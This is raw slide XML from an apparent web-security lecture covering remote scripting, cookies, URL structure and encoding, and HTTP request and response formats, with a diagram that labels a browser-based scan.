            <a:chExt cx="1875" cy="447"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50204" name="Freeform 14"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1858" y="2539"/>
              <a:ext cx="1523" cy="212"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1544"/>
                <a:gd name="T1" fmla="*/ 4836 h 176"/>
                <a:gd name="T2" fmla="*/ 585 w 1544"/>
                <a:gd name="T3" fmla="*/ 186 h 176"/>
                <a:gd name="T4" fmla="*/ 1190 w 1544"/>
                <a:gd name="T5" fmla="*/ 6030 h 176"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1544"/>
                <a:gd name="T10" fmla="*/ 0 h 176"/>
                <a:gd name="T11" fmla="*/ 1544 w 1544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4" h="176">
                  <a:moveTo>
                    <a:pt x="0" y="140"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="70"/>
                    <a:pt x="502" y="0"/>
                    <a:pt x="759" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1016" y="12"/>
                    <a:pt x="1280" y="94"/>
                    <a:pt x="1544" y="1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5" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1506" y="2813"/>
              <a:ext cx="101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>
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2) “check this out”</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50188" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5599113" y="5387975"/>
            <a:ext cx="1100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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50189" name="Picture 17" descr="cisco-520-2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0288" y="5807075"/>
            <a:ext cx="14255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6953250" y="2874963"/>
            <a:ext cx="1855788" cy="1420812"/>
            <a:chOff x="4439" y="1621"/>
            <a:chExt cx="1169" cy="895"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50201" name="Picture 11" descr="CompaqAlphaServerES4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80" y="1621"/>
              <a:ext cx="728" cy="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202" name="Line 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4439" y="2054"/>
              <a:ext cx="32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3" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4541" y="2204"/>
              <a:ext cx="27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tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>scan</a:t>
              </a:r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6981825" y="4876800"/>
            <a:ext cx="1751013" cy="1436688"/>
            <a:chOff x="4457" y="2882"/>
            <a:chExt cx="1103" cy="905"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50198" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop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55" y="2882"/>
              <a:ext cx="905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99" name="Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4504" y="3017"/>
              <a:ext cx="341" cy="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0" name="Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4457" y="3152"/>
              <a:ext cx="27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tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>scan</a:t>
              </a:r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4826000" y="5535613"/>
            <a:ext cx="666750" cy="384175"/>
            <a:chOff x="3048" y="3297"/>
            <a:chExt cx="473" cy="383"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50196" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3048" y="3297"/>
              <a:ext cx="361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7" name="Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3208" y="3435"/>
              <a:ext cx="313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tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>scan</a:t>
              </a:r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2146300" y="5214938"/>
            <a:ext cx="3173413" cy="593725"/>
            <a:chOff x="1411" y="3095"/>
            <a:chExt cx="1999" cy="374"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50194" name="Freeform 32"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1887" y="3095"/>
              <a:ext cx="1523" cy="212"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1544"/>
                <a:gd name="T1" fmla="*/ 4836 h 176"/>
                <a:gd name="T2" fmla="*/ 585 w 1544"/>
                <a:gd name="T3" fmla="*/ 186 h 176"/>
                <a:gd name="T4" fmla="*/ 1190 w 1544"/>
                <a:gd name="T5" fmla="*/ 6030 h 176"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1544"/>
                <a:gd name="T10" fmla="*/ 0 h 176"/>
                <a:gd name="T11" fmla="*/ 1544 w 1544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4" h="176">
                  <a:moveTo>
                    <a:pt x="0" y="140"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="70"/>
                    <a:pt x="502" y="0"/>
                    <a:pt x="759" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1016" y="12"/>
                    <a:pt x="1280" y="94"/>
                    <a:pt x="1544" y="1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5" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1411" y="3296"/>
              <a:ext cx="12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>
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>3) port scan results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8141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1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Remote scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level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smtClean="0"/>
              <a:t>Goal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Exchange data between a client-side app running in a browser and server-side app,  without reloading page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Java Applet/ActiveX control/Flash </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Can make HTTP requests and interact with client-side JavaScript code,  but requires LiveConnect (not available on all browsers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>XML-RPC </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>open, standards-based technology that requires XML-RPC libraries on server and in your client-side code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Simple HTTP via a hidden IFRAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>IFRAME with a script on your web server (or database of static HTML files) is by far the easiest of the three remote scripting options  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" smtClean="0"/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1515662" y="6443246"/>
            <a:ext cx="61805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See:  http://developer.apple.com/internet/webcontent/iframe.html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143000" y="5638800"/>
            <a:ext cx="6324600" cy="707886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Important </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Point: A web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can maintain bi-directional communication with browser (until user closes/quits)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86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Cookie Security Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13742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305800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Personalization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User tracking:   e.g.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Doubleclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   (3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> party cookies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser will store:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At most  20 cookies/site,     3 KB / cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Origin is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tuple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;domain, path&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can set cookies valid across a domain suffix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2153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URLs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13527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Global identifiers of network-retrievable documents </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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/>
              <a:t> http://northwestern.edu:81/class?name=eecs450#homework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Special characters are encoded as hex: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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%0A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = newline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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = space, %2B = +  (special exception)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85800" y="2855913"/>
            <a:ext cx="6096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1371600" y="2855913"/>
            <a:ext cx="13716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2743200" y="2855913"/>
            <a:ext cx="246063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Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="2855913"/>
            <a:ext cx="6096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Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="2855913"/>
            <a:ext cx="13716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Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="2855913"/>
            <a:ext cx="19050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AutoShape 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="103188" y="3535363"/>
            <a:ext cx="914400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val 108333"/>
              <a:gd name="adj3" fmla="val -145833"/>
              <a:gd name="adj4" fmla="val 11406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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24587" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="4262438"/>
            <a:ext cx="1143000" cy="269875"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val 108333"/>
              <a:gd name="adj3" fmla="val -364361"/>
              <a:gd name="adj4" fmla="val 13236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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Hostname</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24588" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2151063" y="4379913"/>
            <a:ext cx="914400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val 108333"/>
              <a:gd name="adj3" fmla="val -413694"/>
              <a:gd name="adj4" fmla="val 9847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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24589" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4294188" y="4370388"/>
            <a:ext cx="914400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -422736"/>
              <a:gd name="adj4" fmla="val -7607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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24590" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6315075" y="4533900"/>
            <a:ext cx="914400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -476426"/>
              <a:gd name="adj4" fmla="val -14875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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24591" name="AutoShape 19"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3810000"/>
            <a:ext cx="1292225" cy="282575"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -194444"/>
              <a:gd name="adj4" fmla="val -5442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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Fragment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09600" y="2241550"/>
            <a:ext cx="8305800" cy="2670175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="808080">
              <a:alpha val="2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GET /index.html HTTP/1.1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Accept: image/gif, image/x-bitmap, image/jpeg, */*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Accept-Language: en</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection: Keep-Alive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User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)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Host: www.example.com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Referer: http://www.google.com?q=dingbats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1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HTTP Request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09600" y="1600200"/>
            <a:ext cx="9969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Method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057400" y="1600200"/>
            <a:ext cx="577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File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200400" y="1600200"/>
            <a:ext cx="16573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HTTP version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990600" y="1924050"/>
            <a:ext cx="0" cy="280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2362200" y="1924050"/>
            <a:ext cx="0" cy="280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3886200" y="1924050"/>
            <a:ext cx="0" cy="280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7620000" y="1600200"/>
            <a:ext cx="1085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Headers</a:t>
            </a:r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H="1">
            <a:off x="7391400" y="1976438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1600200" y="5272088"/>
            <a:ext cx="23812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Data – none for GET</a:t>
            </a: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H="1" flipV="1">
            <a:off x="838200" y="4733925"/>
            <a:ext cx="762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200400" y="4905375"/>
            <a:ext cx="1263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Blank line</a:t>
            </a:r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H="1" flipV="1">
            <a:off x="838200" y="4429125"/>
            <a:ext cx="2362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54768" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="595313" y="6019800"/>
            <a:ext cx="8120493" cy="461665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GET :   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>no side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>effect           POST :   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>possible side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>effect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54075" y="2589213"/>
            <a:ext cx="7086600" cy="2862262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="80808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HTTP/1.0 200 OK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Date: Sun, 21 Apr 1996 02:20:42 GMT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Server: Microsoft-Internet-Information-Server/5.0 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Connection: keep-alive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Content-Type: text/html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Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT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Set-Cookie: …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Content-Length: 2543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 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&lt;HTML&gt; Some data... blah, blah, blah &lt;/HTML&gt;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HTTP Response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77875" y="1619250"/>
            <a:ext cx="16573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HTTP version</a:t>
            </a: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1539875" y="19431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597150" y="1619250"/>
            <a:ext cx="1479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Status code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237037" y="1619250"/>
            <a:ext cx="1822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Reason phrase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2530475" y="1943100"/>
            <a:ext cx="685800" cy="661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>
            <a:off x="3063875" y="1943100"/>
            <a:ext cx="1676400" cy="738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7483475" y="1695450"/>
            <a:ext cx="1085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Headers</a:t>
            </a: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>
            <a:off x="6569075" y="2019300"/>
            <a:ext cx="1371600" cy="1042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8199437" y="3671888"/>
            <a:ext cx="679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Data</a:t>
            </a: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7050087" y="4052888"/>
            <a:ext cx="145415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2400" y="5772150"/>
            <a:ext cx="11826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b="1"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27663" name="Freeform 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="344487" y="4400550"/>
            <a:ext cx="434975" cy="1460500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 169607 w 435078"/>
              <a:gd name="T1" fmla="*/ 1460090 h 1460090"/>
              <a:gd name="T2" fmla="*/ 36872 w 435078"/>
              <a:gd name="T3" fmla="*/ 589936 h 1460090"/>
              <a:gd name="T4" fmla="*/ 66368 w 435078"/>
              <a:gd name="T5" fmla="*/ 117987 h 1460090"/>
              <a:gd name="T6" fmla="*/ 435078 w 435078"/>
              <a:gd name="T7" fmla="*/ 0 h 1460090"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 435078"/>
              <a:gd name="T13" fmla="*/ 0 h 1460090"/>
              <a:gd name="T14" fmla="*/ 435078 w 435078"/>
              <a:gd name="T15" fmla="*/ 1460090 h 14600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5078" h="1460090">
                <a:moveTo>
                  <a:pt x="169607" y="1460090"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="111843" y="1136855"/>
                  <a:pt x="54079" y="813620"/>
                  <a:pt x="36872" y="589936"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19665" y="366252"/>
                  <a:pt x="0" y="216310"/>
                  <a:pt x="66368" y="117987"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132736" y="19664"/>
                  <a:pt x="283907" y="9832"/>
                  <a:pt x="43507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US" sz="24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Cookies:   client state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09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ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{21B46397-9ABA-41D2-BBEA-0C987D291BDA}" type="slidenum">
              <a:rPr lang="en-GB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51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6" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1295400"/>
            <a:ext cx="2157413" cy="5334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/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137318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8001000" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Used to store state on user’s machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373189" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="1997075"/>
            <a:ext cx="1128713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3190" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="2097088"/>
            <a:ext cx="9144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rgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373191" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2835275"/>
            <a:ext cx="1524000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 1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3192" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
